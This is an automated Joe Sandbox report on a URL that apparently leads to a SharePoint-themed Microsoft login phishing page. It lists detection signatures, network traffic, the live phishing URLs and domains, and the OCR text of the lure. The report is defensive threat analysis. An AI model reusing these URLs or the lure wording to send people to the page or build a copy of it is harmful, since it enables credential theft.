Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://campus.espaciocicfa.com/Sharepointproposal/

Overview

General Information

Sample URL:	https://campus.espaciocicfa.com/Sharepointproposal/
Analysis ID:	1420086

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

HTML page contains suspicious base64 encoded javascript

Phishing site detected (based on image similarity)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid T&C link found

Phishing site detected (based on OCR NLP Model)

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://campus.espaciocicfa.com/Sharepointproposal/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,9369236093075254053,8338817010972306088,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

HTML page contains suspicious base64 encoded javascript

Source: https://0fs.akedespr.com/FVpjv4/

HTTP Parser: Base64 decoded: <script>

Phishing site detected (based on image similarity)

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG

HTTP Parser: Number of links: 0

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://0fs.akedespr.com/FVpjv4/

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG

HTTP Parser: Title: fipswwLWRw does not match URL

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG	HTTP Parser: Invalid link: Terms of use
Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG	HTTP Parser: Invalid link: Privacy & cookies

Source: Chrome DOM: 0.0

ML Model on OCR Text: Matched 97.2% probability on "Microsoft Sharepoint 1. SHAREPOINT FILE Hello, You have been granted secure access to view the Share Point file below > ACCESS SHAREPOINT Thank You! { @ 2023 sharepoint. Enter your answer Submit "

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG

HTTP Parser: <input type="password" .../> found

Source: https://0fs.akedespr.com/FVpjv4/	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pwu00/0x4AAAAAAAVnMFwDcYXj89bG/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pwu00/0x4AAAAAAAVnMFwDcYXj89bG/auto/normal	HTTP Parser: No favicon
Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG	HTTP Parser: No favicon

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG

HTTP Parser: No <meta name="author".. found

Source: https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.196.177.159:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.196.177.159:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49808 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.196.177.159
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103

Source: unknown

DNS traffic detected: queries for: campus.espaciocicfa.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.196.177.159:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.196.177.159:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49808 version: TLS 1.2

Source: classification engine

Classification label: mal48.phis.win@18/52@32/262

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://campus.espaciocicfa.com/Sharepointproposal/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,9369236093075254053,8338817010972306088,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,9369236093075254053,8338817010972306088,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://campus.espaciocicfa.com/Sharepointproposal/	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
0fs.akedespr.com	172.67.197.194	true	false		unknown
a.nel.cloudflare.com	35.190.80.1	true	false		high
code.jquery.com	151.101.194.137	true	false		high
d2vgu95hoyrpkh.cloudfront.net	18.64.174.30	true	false		high
challenges.cloudflare.com	104.17.3.184	true	false		high
www.google.com	142.251.35.228	true	false		high
campus.espaciocicfa.com	190.183.195.2	true	false		unknown
cdn.socket.io	unknown	unknown	false		high
cdn.forms.office.net	unknown	unknown	false		high
lists.office.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pwu00/0x4AAAAAAAVnMFwDcYXj89bG/auto/normal	false		high
https://campus.espaciocicfa.com/Sharepointproposal/	false		unknown
https://0fs.akedespr.com/FVpjv4/	true		unknown
https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG	true		unknown
https://campus.espaciocicfa.com/Sharepointproposal/loading.php	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.178.50.35	unknown	United States		15169	GOOGLEUS	false
20.189.173.8	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.97.84	unknown	United States		15169	GOOGLEUS	false
20.42.72.131	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.17.3.184	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
190.183.195.2	campus.espaciocicfa.com	Argentina		20207	GigaredSAAR	false
142.250.64.163	unknown	United States		15169	GOOGLEUS	false
23.56.5.194	unknown	United States		20940	AKAMAI-ASN1EU	false
23.56.5.217	unknown	United States		20940	AKAMAI-ASN1EU	false
20.110.205.119	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.101.194.137	code.jquery.com	United States		54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
172.217.2.206	unknown	United States		15169	GOOGLEUS	false
172.67.197.194	0fs.akedespr.com	United States		13335	CLOUDFLARENETUS	false
52.109.2.112	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.237	unknown	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
192.178.50.46	unknown	United States		15169	GOOGLEUS	false
18.64.174.30	d2vgu95hoyrpkh.cloudfront.net	United States		3	MIT-GATEWAYSUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.251.35.228	www.google.com	United States		15169	GOOGLEUS	false
13.107.213.51	unknown	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.64.170	unknown	United States		15169	GOOGLEUS	false
104.17.2.184	unknown	United States		13335	CLOUDFLARENETUS	false
142.250.217.170	unknown	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1420086
Start date and time:	2024-04-04 12:43:42 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
